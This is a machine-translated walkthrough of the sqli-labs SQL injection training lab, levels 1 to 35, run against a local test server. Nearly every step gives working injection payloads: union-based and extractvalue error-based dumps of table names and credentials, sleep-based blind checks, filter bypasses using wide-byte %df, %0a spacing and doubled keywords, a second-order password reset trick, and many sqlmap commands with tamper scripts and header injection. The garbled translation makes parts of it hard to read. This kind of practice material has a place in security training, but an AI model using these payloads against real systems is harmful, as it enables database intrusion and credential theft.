Sqli-labs Less (1-35) summary

First, attach the tool:

phpstudy2016: Link: http://pan.baidu.com/s/1bpbEBCj Password: FMR4

Sqli-labs-master: Link: http://pan.baidu.com/s/1jH4WlMY Password: 11MJ

The environment has been written before, there is not much to say, directly to start the customs experience

All the experiments are taking the current database as an example, that is ...

The first question explains the initial judgment and closure of injection, and the follow-up does not explain ...

First, http://127.0.0.1/sqli-labs-master/Less-1/?id=1

First Method: Manual Union Union query injection

Enter the single quotation mark, as shown in the result:

According to the error message, you can determine the input parameters are stored in the middle of a pair of single quotes, the brain to fill in the 1 of our input in the database is: Select ... where id= ' 1 ' ..., the extra steps don't say more, just start exploding data.

Explosion Watch

Http://127.0.0.1/sqli-labs-master/Less-1/?id=0 ' UNION SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_ Schema.tables where Table_schema=database ()--+

Explode field

http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat%28column_name%29,3%20from% 20information_schema.columns%20where%20table_name=%27users%27%20--+

Burst value

http://127.0.0.1/sqli-labs-master/Less-1/?id=0%27%20union%20select%201,group_concat%28username,0x3a,password% 29,3%20from%20users%20--+

The second method: Manual injection of error type

Explosion Watch

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_ concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29%29%20--+

Explode field

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_ concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27%29%29%29%20--+

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_ Concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27 and column_name not In (' user_id ', ' first_name ', ' last_name ', ' us ')%29%29%29%20--+

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_ Concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20column_ name%20not%20in%20%28%27user_id%27,%27first_name%27,%27last_name%27,%27us%27,%27user%27,%27password%27,% 27avatar%27,%27last_login%27%29%29%29%29%20--+

Burst value

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_ concat%28username,0x3a,password%29%20from%20users%29%29%29--+

Http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=extractvalue%281,concat%280x7e,%28select%20group_ concat%28username,0x3a,password%29%20from%20users%20where%20username%20not%20in%20%28%27dumb%27,%27i-kill-you% 27%29%29%29%29--+

The steps are similar, do not repeat

Third method: Sqlmap tool for Injection

Use the-V 0 parameter in this tool just for better ...

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-1/?id=1--technique UE--dbms mysql–batch–v 0

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-1/?id=1--technique UE--dbms mysql--dbs--batch-v 0

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-1/?id=1--technique UE--dbms mysql-d security--tables--batch-v 0

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-1/?id=1--technique UE--dbms mysql-d security-t users--columns-- Batch-v 0

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-1/?id=1--technique UE--dbms mysql-d security-t users-c username,p Assword--dump--batch-v 0

Other libraries, tables, fields will not explode,,,

Second, http://127.0.0.1/sqli-labs-master/Less-2/?id=1

Input single quotation marks, according to the error information to determine what we entered into the database, can also be called digital injection, the first question in the id=1 after the single quotation marks, the others remain unchanged on the line, no longer repeat ...

Third, http://127.0.0.1/sqli-labs-master/Less-3/?id=1

Enter single quotation marks, according to the error information to determine what we entered into a pair of single quotation marks and parentheses, the brain to fill in the location of the database statements we enter 1, like Select ... from ... where id= (' 1 ') ..., in the first question Id=1 ' behind the single quotation mark Plus) , the others remain the same, and no longer repeat ...

Iv. http://127.0.0.1/sqli-labs-master/Less-4/?id=1

Enter single quotation marks, no changes to the page, try to enter double quotation marks, page error, according to the error message to determine what we entered into a team of double quotation marks and parentheses, brain repair: Select ... from ... where id= ("1") ..., Change the quotation mark after 1 in the first question to double quotation mark Plus).

Wu, http://127.0.0.1/sqli-labs-master/Less-5/?id=1

See this error message, the first reaction on the line of Boolean blind, error injection, time delay type blind, nine times Union union query type injection can not be used ...

In a simple test, the guesses are all right, and the following is a blind note that validates the time delay type:

http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27%20and%20sleep%285%29--+

Error injection, the method is the same as the first question, are single-cited sizes

Boolean and time delay type blinds recommended to run with Sqlmap ...

Liu, http://127.0.0.1/sqli-labs-master/Less-6/?id=1

Replace the single quotation mark of the previous question with a double quotation mark.

Seven, http://127.0.0.1/sqli-labs-master/Less-7/?id=1

Several attempts, it is not difficult to guess the comment is filtered ..., direct input http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27%20and%20%271%27=%271

From the error message is not difficult to see the error type injection basic, direct Boolean blind or time blind, using Sqlmap run,

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-7/?id=1--technique B--dbms mysql--batch-v 0

Eight, http://127.0.0.1/sqli-labs-master/Less-8/?id=1

The input is placed in a pair of single quotes, and the annotation is available to construct the payload:

http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27%20and%201=1%20--+

http://127.0.0.1/sqli-labs-master/Less-8/?id=1%27%20and%202=1%20--+

Judging the existence of a Boolean blind, use Sqlmap run, and the same as the seventh question ...

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-8/?id=1--technique B--dbms mysql--batch-v 0

Nine, http://127.0.0.1/sqli-labs-master/Less-9/?id=1

The contents of the argument are placed in a pair of single quotation marks, without the need for brain compensation ... Annotation characters are available

Simple judgment: Http://127.0.0.1/sqli-labs-master/Less-9/?id=1%27%20and%20sleep (5)%20--+

Page response delay, to determine the existence of time-delay injection, run directly with Sqlmap,

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-9/?id=1--technique T--dbms mysql--batch-v 0

Ten, Http://127.0.0.1/sqli-labs-master/Less-10/?id=1

The input parameter content, 1, is placed in a pair of double quotation marks, and the annotation is available

Http://127.0.0.1/sqli-labs-master/Less-10/?id=1%22%20and%20sleep (5)--+

Page response delay, time delay type injection, direct use of Sqlmap run,,,

Here you need to modify the prefix file content as follows, modify the contents of the Boundaries.xml file under the XML folder as shown,,,

Run directly with Sqlmap,

Xi. http://127.0.0.1/sqli-labs-master/Less-11/

11 to 21 off are all post-type, need to use the Grab kit tool, I used the Burpsuite tool

Burpsuite Grab bag, simple test, there are error-type injection

Uname=admin ' and Extractvalue (1,concat (0x7e, (select Database ()))--+&passwd=admin&submit=submit

Direct Sqlmap run,,,,,,

Again, the existence of union union query injection, as shown in,

Straight Sqlmap Run,

12, http://127.0.0.1/sqli-labs-master/Less-12/

Double quotes, error type

Direct Sqlmap run,,,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506657847007.req--technique E--dbms mysql--batch-v 0

13, http://127.0.0.1/sqli-labs-master/Less-13/

The packet-capture test injection type, the input parameter content is placed in ('), the annotation is available, as shown in,

Run directly with Sqlmap,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506661582400.req--prefix "')"--technique E--dbms MySQL--batch-v 0

14, http://127.0.0.1/sqli-labs-master/Less-14/

The input is placed in double quotes, the error injection, the comment is not available, as shown in,

Use Sqlmap to run,,,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506662249280.req--technique E--dbms mysql--batch-v 0

XV, http://127.0.0.1/sqli-labs-master/Less-15/

Depending on the page display, you can measure the blinds as Boolean and time delay, as shown in

Uname=admin ' and 1=1--+&passwd=admin&submit=submit

Uname=admin ' and 1=2--+&passwd=admin&submit=submit

Uname=admin ' and Sleep (5)--+&passwd=admin&submit=submit

Page response delay, you can see the existence of time-delayed injection,

Run directly with Sqlmap,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506662373346.req--technique T--dbms mysql--batch-v 0--threads 8

Boolean blind There is a point problem, using the Sqlmap tool did not run out,,, can only be by hand to explode, bitter force,

16, http://127.0.0.1/sqli-labs-master/Less-16/

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506664390744.req-p "uname"--technique T--dbms mysql--batch-- Level 3--threads 8-v 0

17, http://127.0.0.1/sqli-labs-master/Less-17/

Error injection, single quotation mark, annotation symbol available

Test with Sqlmap

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506754249224.req-p passwd--tech E--dbms mysql--batch-v 0

18, http://127.0.0.1/sqli-labs-master/Less-18/

Error-type, single-quote, user-agent-type injection point,,,

Run directly with Sqlmap, and add an * number after the user-agent content of the HTTP request header

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506757146400.req--user-agent mozilla/5.0 (Windows NT 10.0; WOW64) applewebkit/537.36 (khtml, like Gecko) chrome/49.0.2623.112 safari/537.36--tech E--dbms mysql--batch-v 0

19, http://127.0.0.1/sqli-labs-master/Less-19/

Error-type, single-quote, Referer-type injection point,

Run directly with Sqlmap, and add an * number after the Referer content of the HTTP request header,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506757627681.req--referer http://127.0.0.1/sqli-labs-master/ less-19/--tech E--dbms mysql--batch-v 0

20, http://127.0.0.1/sqli-labs-master/Less-20/

Error-type, single-quote, cookie-type injection

Directly with the Sqlmap test,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506758959558.req--cookie uname=admin--tech E--dbms MySQL--batch -V 0

21, http://127.0.0.1/sqli-labs-master/Less-21/

This and 20 close similar, only the uname value of the cookie has been Base64 encoded, the use of Sqlmap directly with a script on the line, directly on the Sqlmap,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506759460951.req--cookie uname=ywrtaw4%3d--tech E--dbms mysql-- Tamper base64encode.py--batch-v 0

22, http://127.0.0.1/sqli-labs-master/Less-22/

Error type, double quotation mark, Base64 code, no change payloads grade required to use--level 3 parameter

Directly on the SQL map,

Sqlmap.py-r C:\Users\esafenet\AppData\Local\Temp\\1506760318956.req--cookie uname=ywrtaw4=--tech E--dbms mysql-- Tamper base64encode.py--batch-v 0

23, http://127.0.0.1/sqli-labs-master/Less-23/

Single quotes, filter the comment, directly on the Sqlmap bar,,

24, Http://127.0.0.1/sqli-labs-master/Less-24/?id=1

With the administrator account of the registered user name, when changing the password to change the Administrator account password effect,

Registered user name: admin ' or ' 1 ' = ' 1 password for admin

After successful registration, log in to change the password, change the password to 123

Changes can be found, the Admin user's password has also been changed to 123,

Self-brain Tonic, update tables set password= ' 123 ' where username= ' admin ' or ' 1 ' = ' 1 '

25, Http://127.0.0.1/sqli-labs-master/Less-25/?id=1

Filter and and OR, bypass method%26%26 instead of and, or double write anandd to bypass, or in | | Or Oorr to replace can be bypassed,,, words not much to say, I here directly modify the script using Sqlmap to run,

The contents of the and2anandd.py script are as follows,

Sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-25/?id=1-p ID--tech E--dbms mysql--tamper and2anandd.py--batch-v 0

26, Http://127.0.0.1/sqli-labs-master/Less-26/?id=1

This topic filters all whitespace characters, and temporarily does not find the character in place of the space,,,,,,, welcome to the big boys to share ^_^

27, Http://127.0.0.1/sqli-labs-master/Less-27/?id=1

Union,select, spaces, comment characters are filtered, directly modify the script combined with Sqlmap test, use%09,%0a and so on instead of spaces, double write instead of select, script and 25 similar,, directly with the Sqlmap test,

Python sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-27/?id=1-p ID--prefix "'"--suffix "%0aand%0a ' 1 ' = ' 1"--tech E--dbms MySQL--tamper select2selecselectt.py,space2%0a.py--batch-v 0

28, Http://127.0.0.1/sqli-labs-master/Less-28/?id=1

http://127.0.0.1/sqli-labs-master/Less-28/?id=0%27)%0aunionunion%0aselect%0aselect%0a1,2,3%0aand%0a (%271%27=% 271

Run directly with Sqlmap, the subject filter the union+ space +select and space, but the sqlmap used is union+all+select, then we just use other whitespace characters to replace the space,

Python sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-28/?id=1--prefix "')"--suffix "%0aand%0a (' 1 ' = ' 1"--tech U- -dbms MySQL--tamper space2%0a.py--batch-v 0

Test found that there is no error injection,,,

29, Http://127.0.0.1/sqli-labs-master/Less-29/?id=1

Directly can be burst, waf like gas action,,

HTTP://127.0.0.1/SQLI-LABS-MASTER/LESS-29/?ID=0%27%20UNION%0AALL%20SELECT%201,GROUP_CONCAT (table_name), 3% 20from%20information_schema.tables%20where%20table_schema=database ()%20--+

Test directly with Sqlmap

Python sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-29/?id=1--dbms mysql--batch-v 0

30, Http://127.0.0.1/sqli-labs-master/Less-30/?id=1

Python sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-30/?id=1--dbms mysql--batch-v 0

31, Http://127.0.0.1/sqli-labs-master/Less-31/?id=1

Python sqlmap.py-u http://127.0.0.1/sqli-labs-master/Less-31/?id=1--dbms mysql--batch-v 0

32, Http://127.0.0.1/sqli-labs-master/Less-32/?id=1

HTTP://127.0.0.1/SQLI-LABS-MASTER/LESS-32/?ID=0%DF%27%20UNION%20ALL%20SELECT%201,GROUP_CONCAT (table_name), 3% 20from%20information_schema.tables%20where%20table_schema=database ()--+

33, http://127.0.0.1/sqli-labs-master/Less-33/

http://127.0.0.1/sqli-labs-master/Less-33/?id=0%df%27%20union%20all%20select%201,2,3--+

HTTP://127.0.0.1/SQLI-LABS-MASTER/LESS-33/?ID=0%DF%27%20UNION%20ALL%20SELECT%201,GROUP_CONCAT (table_name), 3% 20from%20information_schema.tables%20where%20table_schema=database ()--+

34, http://127.0.0.1/sqli-labs-master/Less-34/

Burpsuite Grab bag, manual test,,

35, Http://127.0.0.1/sqli-labs-master/Less-35

HTTP://127.0.0.1/SQLI-LABS-MASTER/LESS-35/?ID=0%20UNION%20SELECT%201,2,GROUP_CONCAT (table_name)%20from% 20information_schema.tables%20where%20table_schema=database ()

To be continued,,,,,,

Sqli-labs Less (1-35) summary